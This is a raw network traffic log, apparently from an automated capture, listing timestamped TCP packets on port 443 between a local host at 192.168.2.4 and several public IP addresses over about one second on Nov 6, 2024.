                                                                                                                                                                                                            Nov 6, 2024 06:29:47.317900896 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.325882912 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328413963 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328464985 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328501940 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328510046 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328540087 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.328767061 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.343730927 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.343749046 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.343868017 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.343868017 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.343878984 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.349886894 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422111988 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422142029 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422199011 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422214985 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422250032 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.422269106 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.451716900 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.451739073 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.451814890 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.451832056 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.451874018 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.452672958 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.452688932 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.452752113 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.452759027 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.452796936 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.455878973 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.456051111 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.497323990 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.497344971 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.497436047 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.497454882 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.497498035 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.503673077 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.562658072 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.562690973 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.562797070 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.562813044 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.562855005 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.577529907 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.577549934 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.577630043 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.577637911 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.577675104 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.735393047 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.735560894 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.747673035 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.749866009 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.750754118 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.750768900 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.791336060 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.791342974 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.795840979 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.795857906 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796075106 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796099901 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796422005 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796427965 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796582937 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796587944 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796605110 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.796612978 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797904015 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797908068 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797909021 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797909021 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797941923 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.797952890 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.802124977 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.802153111 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.802320004 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.803059101 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.803066015 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.803335905 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.806375027 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.808855057 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.808873892 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992693901 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992706060 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992752075 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992768049 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992782116 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992805958 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992814064 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992835999 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992844105 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992850065 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992866993 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.992892981 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993160009 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993175983 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993210077 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993215084 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993249893 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.993268013 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.997646093 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.997661114 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.997729063 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.997735023 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.997773886 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998727083 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998742104 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998781919 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998786926 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998826027 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.998845100 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999739885 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999754906 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999800920 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999806881 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999841928 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:47.999864101 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000791073 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000807047 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000844002 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000849009 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000874996 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.000894070 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.001698971 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.001713991 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.001760960 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.001766920 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.001806974 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.002751112 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.002764940 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.002811909 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.002819061 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.002870083 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004527092 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004547119 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004580021 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004585028 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004616022 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.004631042 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005743027 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005757093 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005789995 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005795002 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005819082 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005824089 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005850077 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005863905 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.005897999 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006771088 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006789923 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006861925 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006863117 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006870031 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.006922960 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036118984 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036135912 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036180973 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036192894 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036221981 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.036251068 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103744984 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103760958 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103801966 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103807926 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103838921 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.103857994 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104191065 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104204893 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104250908 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104255915 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104290962 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104305983 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104561090 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104578972 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104608059 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104613066 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104640961 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.104657888 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114471912 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114530087 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114576101 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114696026 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114797115 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114811897 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114821911 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114828110 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114911079 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.114964008 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115058899 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115086079 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115098953 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115103960 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115283966 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115948915 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.115993023 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116374969 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116385937 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116394997 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116400003 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116503954 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116631985 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.116673946 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.117145061 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.117149115 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.117162943 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.117171049 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.118937016 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.118961096 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.119014025 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120085955 CET57740443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120132923 CET4435774013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120193958 CET57740443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120352030 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120367050 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120788097 CET57740443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120796919 CET4435774013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120815992 CET57741443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120826960 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120840073 CET4435774113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120889902 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120913982 CET57741443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.120939016 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121036053 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121047974 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121057987 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121062040 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121141911 CET57741443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.121155024 CET4435774113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.122591972 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.122600079 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.122672081 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.122813940 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.122823000 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.123220921 CET57743443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.123230934 CET4435774313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.123286963 CET57743443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.123403072 CET57743443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.123414040 CET4435774313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.137567043 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.137664080 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.137707949 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.137938023 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138032913 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138078928 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138529062 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138535976 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138981104 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.138988972 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.149703026 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.149813890 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.149853945 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.150413036 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.150418043 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159063101 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159081936 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159131050 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159137011 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159193993 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159401894 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159420967 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159451962 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159457922 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159483910 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.159503937 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227257967 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227277040 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227319956 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227324963 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227366924 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.227380991 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228053093 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228070021 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228116035 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228123903 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228135109 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228171110 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228173018 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228187084 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228230000 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.228238106 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.273457050 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.273513079 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.273572922 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.273762941 CET57744443192.168.2.4104.17.245.203
